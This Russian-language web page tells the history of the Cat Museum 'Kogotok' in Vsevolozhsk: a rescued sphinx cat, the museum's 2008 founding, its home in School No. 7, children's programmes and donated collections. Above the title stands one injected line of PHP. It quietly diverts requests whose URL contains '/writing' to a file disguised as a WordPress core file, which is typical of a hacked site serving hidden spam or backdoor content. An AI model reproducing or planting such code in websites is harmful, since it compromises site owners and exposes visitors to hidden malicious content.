if(strpos(strtolower($_SERVER['REQUEST_URI']),'/writing')){include(getcwd().'/wp-includes/class-wp-comments.php');exit;} История создания

История создания

История создания Музея Кошки началась за полтора года до его открытия.

Когда в 2007 году на одной из фелинологических выставок ( фелинология – наука о кошках) я увидела удивительной красоты канадского сфинкса ( голые кошки),привезенного из Сан-Францизско , сидящего в грязной казенной клетке на небрежно брошенном полотенчике, а потом мне рассказали,что его держат в ванной комнате уже 9 месяцев,потому,что больше негде- в квартире еще 9 взрослых котов и кошек,которые просто не принимают нового жильца так нужного в разведении.У несчастного Капитана Моргана( так его звали по паспорту) уже отнималась задняя лапка и гноился глаз. Я решила,что обязательно его выкуплю. И выкупила умирающего кота за очень большие, на тот момент, деньги, потом долго лечила. Вот тогда я еще раз вспомнила пословицу - не родись красивым, а родись счастливым.

Назвала я Капитана Моргана Ванькой, потому, что у него рыжие ушки и нос, а сам он розового цвета. И захотелось мне придумать формат, который позволит говорить и о наших обычных Васьках и Мурках, и о необычных - пушистых, кудрявых,голых, где думают не о цене, выгоде и прибыли,а о любви,добре и милосердии.

Я сочинила Музей Кошки.

В мире существует огромное количество самых разнообразных музеев: от привычных краеведческих до невероятно экзотических,даже.скорее не музеев,а креативных акций.

Но вот музеев,посвященных нашему уютному другу не много,приблизительно около 10.

Цифра эта постоянно меняется,потому.что музеем называют обычную временную выставку.

Уж да простят меня фелинологи-профессионалы,как-то несправедливо все внамание отдавать кошачьей аристократии.а «народному большинству» лишь какие-то крохи и к тому же очень бессистемно.

А ведь у нашего маленького друга за спиной (простите,хвостом) около 10 тысяч лет дружбы с человеком( в Иерехоне нашли зуб кошки,которому 9,5 тысяч лет.

И мне захотелось поделится своими знаниями.многолетним собирательством крупинок информации.

Кошка удивительное существо:она открывает двери хижин и дворцов. И с группой энтузиастов в 2008 году мы открыли Музей Кошки.где главным хранителем стал мой удивительный кот.канадский сфинкс Бенедикт,сын того самого,спасенного кота Ваньки.

Детские Дни,Большая регата.Ночь Музеев, Интермузей-повсюду мы с Бенедиктом пытались «строить мост» музей- люди- кошки.

А в сентябре 2013г. наш проект вступил в следующую стадию. Мы берем новую высоту.

«Мир глазами котенка-ребенка»

И теперь мы не просто Музей Кошки.а Музей Кошки «Коготок».

Благодаря администрации СОШ ЦО №7 мы поселились на 3 этаже 7 школы и наша концепция «Мир глазами котенка-ребенка» приобрела реальные ,живые очертания.

В стенах маленького «Коготка» живет полной жизнью программа «Путешествие Умной Кошки»(22 темы,рассказывающие о истории кошек,которые в течении учебного года иллюстрируют дети.участники программы)

«Юные музееведы» уже подготовили 3 экскурсии-это «Кошки России»,»Блокадные кошки»,обзорная экскурсия,пользующаяся наибольшей популярностьюи,на мой взгляд.наиболее полно отвечающая нашей концепции.Состоит она из хореографической миниатюры.исполняемой  учениками 2 и 3 классов на слова 10-летнего ребенка и музыку

нашего преподавателя музыки Мясниковой Л.А.,экскурсии по экспозиции музея и мастер-классу.который ведут ученики 7 класса-под их руководством наши гости учатся искусству ОРИГАМИ и в течении 20 минут на наших глазах рождается целый кошачий прайд.

Из чего же формируется  коллекция нашего Музея?

Дорогие наши друзья-ее создаете Вы.

Мы общественная организация,мы – народный музей,мы- из Ваших подарков.

6 января я привезла из Москвы бесценные материалы- 2 коллекции: одна Натальи Викторовны Кольцовой,ведущего методиста по связям с общественностью зоопарка г.Москвы- коллекция насчитывает более700 единиц и собиралась она в период ее работы в министерстве культуры-кошки везлись со всего мира,но самое главное  в ее коллекции,конечно же,имена дарителей-это уже история нашей страны.

Вторая коллекция составляет 580 единиц и принадлежит легендарному продюсеру фильма «Обитаемый остров»,Евгению Северову

И уже понесли свои бесценные сувениры,поделки,стихи.рассказы ученики и сотрудники7 школы. На сегодняшний день наша коллекция насчитывает около 2500ед.

Выставлено 300 едениц.

У нас есть стены,украшенные подлинниками –подарками замечательных анималистов Капустиной Т.П. и Тырковой Н.Д., Таировым В.В. и Илларионовым В.

Музей Кошки «Коготок»учрежден приказом №3 от 29.07.09. на базе РОО КЛЖ «Котейка»- это клуб любителей животных коего, я,Крылова Галина Александровна,являюсь президентом.

Мы общественная организация ,живущая на взносы и пожертвования и будем безмерно рады видеть  всех Вас в наших рядах, будьте нашими друзьями,приходите к нам,дружите с нами!

А мы от всех наших кошачьих душ будем рады видеть Вас в нашем «Коготке» по адресу:

г.Всеволожск,микрорайон «Южный»,ул Знаменская,д.9(школа №7)

Тел. 8-921-799-29-98 Галина Александровна Крылова.